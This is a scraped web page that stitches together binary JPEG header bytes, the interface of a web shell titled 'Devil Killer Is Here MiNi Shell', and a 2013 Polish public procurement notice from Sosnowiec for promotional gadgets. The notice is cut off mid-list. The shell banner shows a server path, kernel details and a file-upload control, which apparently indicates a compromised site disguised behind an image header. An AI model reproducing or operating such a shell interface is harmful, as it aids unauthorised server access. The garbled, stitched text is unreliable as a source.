JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130308/35723-N-2013.html

<p class="kh_header"><b>Sosnowiec: Dostawa gadżetów promocyjnych z charakterystycznymi elementami miasta Sosnowca</b><br>
<b>Numer ogłoszenia: 35723 - 2013; data zamieszczenia: 08.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa gadżetów promocyjnych z charakterystycznymi elementami miasta Sosnowca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa gadżetów promocyjnych z charakterystycznymi elementami miasta Sosnowca na potrzeby Urzędu Miejskiego. Zakres zamówienia obejmuje: dostawę artykułów, umiejscowienie projektów graficznych logo, oraz innych oznaczeń na zamawianych artykułach promocyjnych, transport wraz z wyładunkiem produktów do miejsca wskazanego przez zamawiającego. Dostarczone materiały promocyjne muszą być wysokiej jakości, pełnowartościowe, pierwszego gatunku, bez wad, posiadać właściwe atesty, pochodzić z bieżącej produkcji, być fabrycznie nowe i nie być przedmiotem praw osób trzecich. Wykonawca umieści materiały promocyjne w opakowaniach zapobiegających ich uszkodzeniu podczas transportu. Próbki dołączone do oferty muszą spełniać wszelkie wymagania określone w opisie przedmiotu zamówienia, za wyjątkiem nadruków, logo, herbu, hasła promocyjnego oraz napisu Sosnowiec. Projekty materiałów promocyjnych zostaną wykonane przez Wykonawcę i zatwierdzone przez Zamawiającego, na podstawie przykładowego materiału promocyjnego dostarczonego do Zamawiającego w terminie 7 dni roboczych od daty podpisania umowy. Korekty wzorów zgłoszone przez Zamawiającego przed ostateczną akceptacją będą przedstawiane przez Wykonawcę w ciągu 2 dni roboczych, od dnia w którym Zamawiający zgłosił uwagi. Przedmiot zamówienia został podzielony na 8 części. Część I - Zadanie I, Część II - Zadanie II, Część III - Zadanie III, Część IV - Zadanie IV, Część V - Zadanie V, Część VI - Zadanie VI, Część VII - Zadanie VII, Część VIII - Zadanie VIII.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie wymaganego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełniania tego warunku dokonywana będzie w oparciu o dotychczas dostarczone materiały promocyjne:
Część I - Zadanie I - Wykonaniu dostaw toreb reklamowych o łącznej wartości co najmniej 5.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości dostaw (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część II - Zadanie II - Wykonaniu dostaw koszulek reklamowych o łącznej wartości co najmniej 8.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości dostaw (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część III - Zadanie III - Wykonaniu dostaw koszulek reklamowych o łącznej wartości co najmniej 2.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości dostaw (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część IV - Zadanie IV - Wykonaniu dostaw długopisów reklamowych o łącznej wartości co najmniej 10.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości dostaw (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część V - Zadanie V - Wykonaniu dostaw gadżetów reklamowych o łącznej wartości 40.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości dostaw (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część VI - Zadanie VI - Wykonaniu dostaw kubków reklamowych o łącznej wartości 10.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości dostaw (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część VII - Zadanie VII - Wykonaniu dostaw leżaków reklamowych o łącznej wartości 5.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości dostaw (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część VIII - Zadanie VIII - Wykonaniu dostaw balonów lub bram lub namiotów pneumatycznych reklamowych o łącznej wartości 10.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości dostaw (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie wymaganego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie wymaganego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie wymaganego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć: wykaz wykonanych, w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw lub usług w okresie ostatnich trzech przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania  i podmiotów na rzecz których dostawy lub usługi zostały wykonane, oraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
2. W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:
aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
3. Dokumenty dotyczące przynależności do tej samej grupy kapitałowej
Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej. 
4. Ewentualne pełnomocnictwo. Jeżeli osoba(-y) podpisująca(-ce) ofertę działa(-ją) na podstawie pełnomocnictwa, to pełnomocnictwo to musi w swej treści jednoznacznie wskazać uprawienie do podpisania oferty (pełnomocnictwo szczegółowe). Pełnomocnictwo to musi być dołączone do oferty i być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza. Wykonawcy chcąc wspólnie ubiegać się o zamówienie - np.: (konsorcjum) - mają obowiązek ustanowienia pełnomocnika. Pełnomocnik musi mieć upoważnienie co najmniej do reprezentowania w postępowaniu wykonawców ubiegających się wspólnie o zamówienie.
5.Próbki asortymentu w Częściach I-VI zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian.
a)Możliwość przedłużenia terminu wykonywania zamówienia w przypadku wystąpienia:
okoliczności uniemożliwiających wykonanie w terminie przedmiotu zamówienia za które żadna ze Stron nie ponosi odpowiedzialności, siła wyższa,
b) Dopuszcza się zmiany:
- nie wykraczające poza przedmiot zamówienia (treść oferty);
- miejsca rozładunku po uzgodnieniu między Stronami;
- podwykonawstwa za uprzednią zgodą zamawiającego:
- powierzenia podwykonawcom innej części prac niż wskazane w ofercie wykonawcy;
- zmiana podwykonawcy na etapie realizacji prac.
2. Zmiany wynagrodzenia umownego:
zamawiający nie przewiduje przez okres obowiązywania umowy zmian w zakresie wynagrodzenia wykonawcy;w przypadku jeżeli w okresie realizacji przedmiotu umowy wystąpi ustawowa zmiana stawki podatku VAT, wówczas Strony podpiszą aneks do umowy aktualizujący wynagrodzenie wykonawcy. W tym przypadku niezmienne pozostanie wynagrodzenie kosztorysowe netto wykonawcy, zaś wartość podatku VAT będzie dostosowywana do obowiązujących przepisów.
3.Nastąpi konieczność zmiany osób wykonujących  zamówienie z  następujących powodów:
- śmierci, choroby lub innych zdarzeń losowych osób wykonujących zamówienie;
- nie wywiązywania się osób wykonujących zamówienie z obowiązków wynikających z powierzonych im zadań;
- jeżeli zmiana osoby wykonującej zamówienie stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji).
Zmiana jest możliwa jedynie na nowe osoby o kwalifikacjach i doświadczeniu nie niższych niż zaproponowane przez wykonawcę w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sosnowcu, Wydział Informacji i Promocji Miasta Al. Zwycięstwa 20, piętro 1, pokój 203 lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2013 godzina 10:00, miejsce: Urząd Miejski w Sosnowcu, Wydział Informacji i Promocji Miasta Al. Zwycięstwa 20, piętro 1, pokój 203..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Reklamówka foliowa - 10.000 sztuk
1. Reklamówka foliowa granatowa, 
2. Surowiec: Folia błyszcząca, grubość folii: 0,085mm, 
3. Wzmocnienie przy uchwytach,
4. Wymiary: ok. 400x500mm, 
5. Zdobienie: Nadruk pełny kolor obie strony. 1strona - logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku; 2 strona - adres strony internetowej www.sosnowiec.pl, 
6. Wymiary logo (maksymalne): 170x100 mm; 
7. Wymiary adresu strony (maksymalne): 170x20mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Koszulka klasyczna - 500 sztuk 
1. Klasyczna koszulka koloru białego unisex,  
2. Surowiec: bawełna 100%, gramatura nie mniejsza niż 185 g/m2.
3. Rozmiary:
rozmiar S 
rozmiar M 
rozmiar L  
rozmiar XL 
4. Zdobienia:
a) nadruk w pełnym kolorze z lewej strony piersi:  logo Sosnowca wraz z hasłem promocyjnym Sosnowiec
łączy zgodnie z SIW i Księgą Znaku - wymiar ok. 80x20mm 
b) nadruk na prawym rękawku: adres strony internetowej www.sosnowiec.pl w polu prostokąta ok. 80x7mm
w kolorze granatowym zgodnie z SIW i Księgą Znaku
5. Ściągacz pod  szyją  bawełniany o elastycznym splocie, podwójny szew wokół wykroju szyi. przy rękawach i u dołu koszulki, bez szwów bocznych, taśma wzmacniająca wzdłuż karku.
2. Koszulka klasyczna - 200 sztuk 
1. Klasyczna koszulka koloru białego unisex.  
2. Surowiec: bawełna 100%, gramatura nie mniejsza niż 155 g/m2.
3. Rozmiary:
rozmiar M 
rozmiar L 
rozmiar XL 
4. Zdobienia: w pełnym kolorze 
a) Nadruk z prawej strony piersi:  logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku - wymiar ok. 130x115mm. 
b) Nadruk z lewej strony piersi: wg dostarczonego wzoru wymiar ok. 130x115mm.
5. Ściągacz pod  szyją  bawełniany o elastycznym splocie, podwójny szew wokół wykroju szyi. przy rękawach i u dołu koszulki, bez szwów bocznych, taśma wzmacniająca wzdłuż karku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Koszulka klasyczna - 100 sztuk 
1. Klasyczna koszulka koloru białego unisex,  
2. Surowiec: bawełna 100%, gramatura nie mniejsza niż 155 g/m2.
3. Rozmiary:
rozmiar S 
rozmiar M 
rozmiar L  
rozmiar XL 
4. Zdobienia:
nadruk na koszulce z przodu wymiary ok. 200x250mm w pełnym kolorze.
5. Ściągacz pod  szyją  bawełniany o elastycznym splocie, podwójny szew wokół wykroju szyi. Przy rękawach i u dołu koszulki, bez szwów bocznych, taśma wzmacniająca wzdłuż karku.
2. Koszulka klasyczna - 100 sztuk 
1. Klasyczna koszulka koloru białego unisex,  
2. Surowiec: bawełna 100%, gramatura nie mniejsza niż 155 g/m2.
3. Rozmiary:
rozmiar S 
rozmiar M 
rozmiar L  
rozmiar XL 
4. Zdobienia:
nadruk na koszulce z przodu wymiary ok. 200x250mm w pełnym kolorze.
5. Ściągacz pod  szyją  bawełniany o elastycznym splocie, podwójny szew wokół wykroju szyi. Przy rękawach i u dołu koszulki, bez szwów bocznych, taśma wzmacniająca wzdłuż karku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Elegancki długopis- 100 sztuk
1. Długopis o jakości nie gorszej niż firmy Parker. Mosiężny korpus ze szczotkowanego metalu. Pokryty lakierem w kolorze szampana. Wyposażony w przyciskowy mechanizm wysuwania wkładu oraz w standardowy wkład. Uchwyt ze stali nierdzewnej oraz klips w formie strzały. 
2. Długopis zapakowany w etui z tworzywa sztucznego lub kartonu. 
3. Wymiary długopisu ok. 135x10mm
4. Zdobienie długopisu: Grawer laserowy monochromatyczny logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku dostosowane do wielkości długopisu 
5. Gwarancja: międzynarodowa - 2 lata od dnia zakupu.
6. Wkład długopisu w kolorze niebieskim.
2. Eleganckie pióro - 100 sztuk
